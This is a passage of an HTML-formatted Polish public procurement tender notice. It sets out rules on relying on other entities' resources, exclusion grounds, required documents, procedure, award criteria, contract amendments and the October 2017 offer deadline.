lubsytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnegołączących go z nim stosunków prawnych. 4. Wykonawca, który polega na zdolnościach lub sytuacjiinnych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponowałniezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tychpodmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Ztreści dokumentów musi wynikać, jakie zasoby podmiot udostępnia i na jakich zasadach oraz w jakimokresie, w jaki sposób te zasoby zostaną wykorzystane przez wykonawcę przy wykonywaniuzamówienia, zaś w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowychlub doświadczenia - z treści dokumentów musi wynikać deklaracja faktycznego udziału podmiotutrzeciego w realizacji zamówienia. 5. Zamawiający ocenia, czy udostępniane wykonawcy przez innepodmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalająna wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy niezachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13-22 iust. 5 u.p.z.p.. 6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty tezrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. 7.Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiadasolidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przezzamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnieniezasobów nie ponosi winy. 8. Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lubfinansowa, podmiotu, o którym mowa w ust. 1, nie potwierdzają spełnienia przez wykonawcęwarunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia,zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego: 1) zastąpił tenpodmiot innym podmiotem lub podmiotami lub 2) zobowiązał się do osobistego wykonaniaodpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuacjęfinansową lub ekonomiczną, o których mowa w ppkt 1. 9. W przypadku, gdy złożone przezwykonawców dokumenty, oświadczenia dotyczące warunków udziału w postępowaniu zawierajądane/informacje w innych walutach niż określono to w niniejszej specyfikacji, Zamawiający, jako kursprzeliczeniowy waluty przyjmie kurs NBP z dnia wszczęcia postępowania. Jeżeli w dniu wszczęciapostępowania nie będzie opublikowany średni kurs walut przez NBP, Zamawiający przyjmie kursprzeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem wszczęcia postępowania ozamówieniu. Kursy walut dostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?f=/kursy/kursy_archiwum.html Zamawiający będzie korzystał z Archiwum kursówśrednich - tabela A . http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx 10. Ocena spełnianiapowyższych warunków udziału w postępowaniu zostanie dokonana wg formuły: ,,spełnia - niespełnia".</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczącychzdolności technicznej lub zawodowej, Zamawiający żąda: a) wykazu narzędzi, wyposażenia zakładulub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz zinformacją o podstawie do dysponowania tymi zasobami - załącznik nr 5 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 23u.p.z.p., Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającegoinformacji, o której mowa w art. 86 ust. 5 u.p.z.p., zobowiązany jest przekazać Zamawiającemuoświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej - załącznik nr3 do SIWZ. Wraz ze złożeniem oświadczenia Wykonawca może przedstawić dowody, że powiązania zinnym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (konsorcjum, spółkacywilna) oświadczenie, o którym mowa w tym punkcie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. 2. Wykonawca zobowiązany jest złożyć wraz z ofertą zobowiązanielub inne dokumenty, o których mowa w pkt 5 ppkt 4, na podstawie których wykonawca udowodniZamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tychpodmiotów. 3. Pozostałe dokumenty, które Wykonawca jest zobowiązany złożyć wraz z ofertą: 1)wypełniony Formularz ofertowy - załącznik nr 1 do SIWZ, 2) sporządzony przez Wykonawcękosztorys ofertowy, 3) w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się oudzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w niniejszympostępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego. 4) pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile prawo doreprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych -postanowienie niniejsze stosuje się odpowiednio do reprezentowania wykonawcy powołanego ifunkcjonującego na podstawie przepisów ustaw. 4. Wykonawcy ubiegający się wspólnie o udzieleniezamówienia (konsorcjum, spółka cywilna) ustanawiają pełnomocnika do reprezentowania ich wpostępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego. Pełnomocnictwo winno być udzielone przez wszystkich wykonawców wchodzących wskład konsorcjum lub spółki cywilnej oraz zostać przedłożone w oryginale lub kopii poświadczonejnotarialnie. 5. W przypadku, gdy złożona przez wykonawcę kopia dokumentu będzie nieczytelna lubbędzie budzić wątpliwości, co do jej prawdziwości, zamawiający może zażądać przedstawieniaoryginału lub notarialnie poświadczonej kopii dokumentu. 6. Dokumenty i oświadczenia sporządzonew języku obcym należy złożyć wraz z tłumaczeniem na język polski. 7. Pełnomocnictwo udzieloneosobie reprezentującej wykonawcę składane przez Wykonawcę powinno być złożone w oryginale lubkopii poświadczonej notarialnie. 8. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie,których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizacjęzamówienia, są zobowiązani dostarczyć Zamawiającemu stosowną umowę regulującą współpracęwykonawców wspólnie realizujących zamówienie, zawierającą w swojej treści minimum następującepostanowienia: 1) określenie celu gospodarczego; 2) określenie, który z podmiotów jest upoważnionydo występowania w imieniu pozostałych przy realizacji ww. zamówienia; 3) oznaczenie czasu trwaniawspółpracy wykonawców wspólnie realizujących zamówienie obejmującego minimum okres realizacjiprzedmiotu zamówienia oraz gwarancji i rękojmi; 4) zakaz zmian w umowie bez zgodyZamawiającego. 9. Nie dopuszcza się składania umowy przedwstępnej regulującej współpracę lubumowy zawartej pod warunkiem zawieszającym.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Najniższa Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin zapłaty</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej pod rygorem nieważności. 2.Zmiana istotnych postanowień umowy może nastąpić w sytuacjach: a) klęski żywiołowej; b) sposoburozliczenia niniejszej umowy, o ile zmiana jest korzystna dla Zamawiającego; c) wstrzymaniawykonywania usług przez Zamawiającego; d) tych postanowień, które mają związek ze zmienionymiregulacjami prawnymi, wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebęzmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany, w przypadku zmiany: - stawki podatku odtowaru i usług, - wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawkigodzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, - zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemulub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, strony dokonają ponownegoustalenia wynagrodzenia Wykonawcy w oparciu o cenę netto z oferty, z uwzględnieniem już rozliczonychprac; e) oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy; f) w przypadku, kiedy wumowie znajdują się oczywiste błędy pisarskie lub rachunkowe, a także zapisy, których wykonanie jestniemożliwe ze względu na obowiązujące przepisy prawa - w zakresie, który jest niezbędny dlawyeliminowania tych błędów; g) wystąpienia co najmniej jednej z okoliczności, wymienionych w art. 144ust. 1 ustawy Prawo zamówień publicznych. 3. Zmiana umowy może obejmować w szczególności: a)zmianę wysokości wynagrodzenia Wykonawcy, b) zwiększenie lub zmniejszenie zakresu obowiązkówWykonawcy, c) zmianę okresu obowiązywania umowy, w tym terminów poszczególnych usług, d)modyfikacji warunków płatności. 4. Warunkiem dokonania zmiany, o której mowa w ust. 2 i 3 jestzłożenie uzasadnionego wniosku przez stronę inicjującą zmianę lub sporządzenie przez strony stosownegoprotokołu. 5. W przypadku zmiany, o której mowa w ust. 2 lit. d) tiret drugie, wynagrodzenie Wykonawcyulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększeniawynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości zmienionego minimalnegowynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostuminimalnego wynagrodzenia. 6. W przypadku zmiany, o którym mowa w ust. 2 lit. d) tiret trzecie,wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jakąbędzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniudotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzeczZamawiającego. 7. Za wyjątkiem sytuacji, o której mowa w ust. 2 lit. d) tiret pierwsze, wprowadzeniezmian wysokości wynagrodzenia wymaga uprzedniego wykazania przez Wykonawcę dowodami zdokumentów wysokości dodatkowych koszów wynikających z wprowadzenia zmian, o których mowa wust. 2 lit. d) tiret drugie i trzecie. 8. Zamawiający zobowiązuje się do dokonania analizy dokumentów, októrych mowa w ust. 7, w terminie do 7 dni od ich przedłożenia przez Wykonawcę. Aneks w tym zakresiezostanie podpisany w terminie uzgodnionym przez obie strony, przy czym termin ten będzie przypadał wokresie nie dłuższym niż 21 dni od daty przedłożenia dokumentów przez Wykonawcę. 9. Wykonawca niebędzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia,jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takimprzypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca. 10. Dokonanie zmian, októrych mowa w ust. 2 i 3, wymaga podpisania aneksu do umowy, z zastrzeżeniem wyjątków wskazanychw treści niniejszej Umowy. Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia podpisania aneksu, o którym mowa w ust. 8.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-10-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span 